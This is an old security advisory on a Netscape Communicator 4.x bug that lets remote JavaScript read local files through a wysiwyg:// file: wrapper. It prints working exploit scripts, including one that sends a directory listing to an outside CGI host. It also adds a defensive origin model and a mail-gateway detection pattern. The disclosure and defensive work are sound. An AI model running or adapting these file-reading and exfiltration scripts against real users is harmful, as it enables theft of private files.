COMMAND

    Netscape Communicator 4.5

SYSTEMS AFFECTED

    Netscape Communicator 4.04, 4.5 for Win95, NT, Linux, MacOS

PROBLEM

    Georgi Guninski found the following.  There is a bug in Netscape
    Communicator 4.5 for Windows 95 and 4.05 for WinNT 4.0 (probably
    others) which allows reading files from the user's computer.  The
    file name need not be known in advance, because directories may be
    browsed.  The contents of the file may be sent to an arbitrary
    host.  For this to work, both Java and JavaScript must be enabled.
    The bug may be exploited via an email message.  A demonstration is
    available at:

        http://www.geocities.com/ResearchTriangle/1711/b6.html

    The Javascript code is:

        sl=window.open("wysiwyg://1/file:///C|/");
        sl2=sl.window.open();
        sl2.location="javascript:s='<SCRIPT>b=\"Here is the beginning of your file: \";var f = new java.io.File(\"C:\\\\\\\\test.txt\");var fis = new java.io.FileInputStream(f); i=0; while ( ((a=fis.read()) != -1) && (i<100) ) { b += String.fromCharCode(a);i++;}alert(b);</'+'SCRIPT>'";

    This is similar to the Java sandbox concept.  Local and signed
    content are "trusted" and can do whatever they like, whereas
    remotely loaded content is "untrusted" and is not supposed to be
    able to perform certain operations.  In the demonstration a remote
    page opens a window through the wysiwyg:// wrapper around a file:
    URL, and script then injected into that window runs with the trust
    given to local content.
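    The following is an added illustration, not code from the advisory or
    from Netscape.  It models the origin decision the browser should have
    made: the wysiwyg:// wrapper is unwrapped before any trust check, a
    non-file origin may not open a file: URL, and a javascript: navigation
    runs with the navigating page's origin (and is refused cross-origin).
    All names (unwrapUrl, originOf, openWindow, navigateWindow,
    replayAdvisoryChain) and the remote address http://remote.example/ are
    assumptions of this example.

```javascript
// Added illustration, not code from the advisory or from Netscape: a small
// origin model that unwraps the "wysiwyg://N/<url>" wrapper before any trust
// decision and applies two rules that stop the chain shown above:
//   1. a non-file origin may not open or navigate a window to a file: URL;
//   2. a javascript: navigation runs with the navigator's origin, never the
//      target window's, and is refused when the two are cross-origin.
// All names below (unwrapUrl, originOf, openWindow, ...) are ours, not browser APIs.

const DEFAULT_PORTS = { http: 80, https: 443, ftp: 21 };

// Strip wrapper schemes, looping so that nesting cannot hide the inner URL.
// "wysiwyg://1/file:///C|/" wraps "file:///C|/"; "view-source:http://a/" wraps "http://a/".
function unwrapUrl(url) {
  let current = url.trim();
  for (;;) {
    const m = /^wysiwyg:\/\/\d+\/(.*)$/i.exec(current) || /^view-source:(.*)$/i.exec(current);
    if (!m) return current;
    current = m[1];
  }
}

// Origin (scheme, host, port) of a URL after unwrapping. javascript: and about:
// URLs have no origin of their own; they inherit one from the context that
// created or navigated the window, so null is returned and the caller decides.
function originOf(url) {
  const u = unwrapUrl(url);
  const schemeMatch = /^([a-z][a-z0-9+.-]*):/i.exec(u);
  if (!schemeMatch) return null;
  const scheme = schemeMatch[1].toLowerCase();
  if (scheme === 'javascript' || scheme === 'about') return null;
  if (scheme === 'file') return { scheme: 'file', host: '', port: 0 };
  const m = /^[a-z][a-z0-9+.-]*:\/\/([^/:?#]+)(?::(\d+))?/i.exec(u);
  if (!m) return null;
  return { scheme, host: m[1].toLowerCase(), port: m[2] ? Number(m[2]) : (DEFAULT_PORTS[scheme] || 0) };
}

function sameOrigin(a, b) {
  return !!a && !!b && a.scheme === b.scheme && a.host === b.host && a.port === b.port;
}

// Rule 1. Returns the new window {url, origin}, or {blocked: reason}.
function openWindow(openerOrigin, url) {
  const target = originOf(url);
  if (target === null) return { url: unwrapUrl(url), origin: openerOrigin }; // inherits opener's origin
  if (target.scheme === 'file' && openerOrigin.scheme !== 'file') {
    return { blocked: 'non-file origin may not open a file: URL (wrapper unwrapped first)' };
  }
  return { url: unwrapUrl(url), origin: target };
}

// Rule 2. Navigating an existing window `win` ({url, origin}) to `url`.
function navigateWindow(navigatorOrigin, win, url) {
  const u = unwrapUrl(url);
  if (/^javascript:/i.test(u)) {
    if (!sameOrigin(navigatorOrigin, win.origin)) {
      return { blocked: 'cross-origin javascript: navigation refused' };
    }
    return { ran: true, origin: navigatorOrigin }; // same-origin: runs with the navigator's origin
  }
  return openWindow(navigatorOrigin, u); // a normal navigation follows the same rule as opening
}

// Replay the three steps of the advisory's script under these rules and report
// where the chain stops. Constructed input: the remote page is assumed to live
// at http://remote.example/; the javascript: URL is a harmless placeholder.
function replayAdvisoryChain() {
  const remote = originOf('http://remote.example/page.html');
  const step1 = openWindow(remote, 'wysiwyg://1/file:///C|/');          // sl = window.open(...)
  if (step1.blocked) return { stoppedAt: 1, reason: step1.blocked };
  const child = openWindow(step1.origin, 'about:blank');                 // sl2 = sl.window.open()
  const step3 = navigateWindow(remote, child, 'javascript:void(0)');     // sl2.location = "javascript:..."
  if (step3.blocked) return { stoppedAt: 3, reason: step3.blocked };
  return { stoppedAt: 0, reason: 'chain completed' };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(replayAdvisoryChain()));
}
```

    Run with node.  Under rule 1 the chain stops at the very first
    window.open, because unwrapping exposes the file: scheme.  Even if
    rule 1 were missing (which is what the wrapper achieved in Netscape),
    rule 2 still refuses the remote page's javascript: assignment into a
    file-origin child window, which is the step that gave the injected
    script local trust.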

    Terence Christopher Haddock added the following.  This security hole
    is not limited to knowing a specific file name; it can be used to
    list the contents of a directory, which I believe is much more
    insidious.  This script can send a list of the files in the user's
    root directory under Windows (simple to modify it for UNIX):

        sl=window.open("wysiwyg://1/file://C|/");
        sl2=sl.window.open();
        sl2.location="javascript:"+
        "b=\"Here is the files in your root directory:\";"+
        "var f=new java.io.file(\"C:\\\\\");"+
        "var files=f.list();"+
        "for (var x=0;x<files.length;x++){"+
        "b+=files[x]+\"\n\""+
        "};"+
        "alert(b);";

    Using a search algorithm, the script could search for specific
    files by running this recursively.  The only problem (from a
    hacker's perspective, a good thing from our perspective) is all
    of the windows it would open.  If a way could be worked around
    this, this script could run without a user even knowing it,
    searching the user's directories and reporting them to a server.

    Also, you may try the following (by Trev):

        http://www.kics.bc.ca/~trev/cgi-bin/test.html
        http://www.kics.bc.ca/~trev/cgi-bin/test-unix.html

    And if you wish, it can even read your directory structure (works
    for Windows; Unix should be straightforward):

        //slight change of Trev's script:
        <SCRIPT>
        alert("List your files in C:\\ and it will be sent to a cgi script.");

        sl=window.open("wysiwyg://1/file:///C|/");
        sl2=sl.window.open();
        sl2.location="javascript:s='<SCRIPT>b=\"\";var f = new java.io.File(\"C:\\\\\\\\\"); var fl=f.list(); i=0; while(i < fl.length) {b += fl[i]+\"\\\\n\"; i++;}w=window.open(\"http://www.kics.bc.ca/~trev/cgi-bin/query_string.cgi?\"+escape(b));</'+'SCRIPT>'";

        </SCRIPT>
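    Since the advisory notes that the bug can be triggered from an email
    message, the following is an added example (not part of the advisory)
    of a content check a mail gateway or proxy could apply to HTML bodies,
    keyed on the traits the three scripts above share: the wysiwyg://
    wrapper around a file: URL, a javascript: URL assigned to a location,
    LiveConnect access to java.io.File, and a window opened from another
    window's context.  The sample bodies and all names (INDICATORS,
    scanHtmlBody, scanSamples) are constructed for this example.

```javascript
// Added example, not part of the advisory: a content check that a mail
// gateway or proxy could apply to HTML bodies, keyed on the traits the three
// scripts above share. Messages below are constructed; names are ours.

const INDICATORS = [
  { name: 'wysiwyg wrapper around a file: URL', re: /wysiwyg:\/\/\d+\/file:/i },
  { name: 'javascript: URL assigned to a location', re: /\.location\s*=\s*["']?\s*javascript:/i },
  { name: 'LiveConnect file access', re: /java\.io\.(File|FileInputStream)\b/i },
  { name: 'window opened from another window', re: /\w+\.window\.open\s*\(/i },
];

// Returns {verdict, hits}. Netscape itself used the wysiwyg: scheme for
// document.write() output, so the wrapper on its own only earns a log entry;
// combined with scripting or LiveConnect file access it is the advisory's pattern.
function scanHtmlBody(body) {
  const hits = INDICATORS.filter(i => i.re.test(body)).map(i => i.name);
  const hasWrapper = hits.includes(INDICATORS[0].name);
  let verdict = 'pass';
  if (hasWrapper && hits.length >= 2) verdict = 'block';
  else if (hits.length > 0) verdict = 'log';
  return { verdict, hits };
}

// Constructed sample bodies. The third mirrors the first two lines of the
// scripts above, with a harmless javascript: placeholder in place of a payload.
const SAMPLES = {
  benign: '<p>Meeting moved to 3pm. <a href="http://intranet.example/agenda">Agenda</a></p>',
  wrapperOnly: '<a href="wysiwyg://3/file:///C|/notes.txt">cached copy</a>',
  chain: '<script>sl=window.open("wysiwyg://1/file:///C|/");sl2=sl.window.open();' +
         'sl2.location="javascript:void(0)";</script>',
};

// Verdict per sample, so the policy can be checked as a whole.
function scanSamples() {
  const out = {};
  for (const [name, body] of Object.entries(SAMPLES)) out[name] = scanHtmlBody(body).verdict;
  return out;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(scanSamples()));
}
```

    The check is deliberately conservative: a single indicator is only
    logged, and the block verdict requires the wrapper plus at least one
    scripting or LiveConnect trait, which is the combination every script
    on this page relies on.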

SOLUTION

    Disable JavaScript and Java.  It appears that the only version of
    Netscape 4.x that *ISN'T* vulnerable is 4.08 (both Windows and
    Unix).  It gives the "security.checkread" error.  All other
    versions faithfully reported back the file contents many times.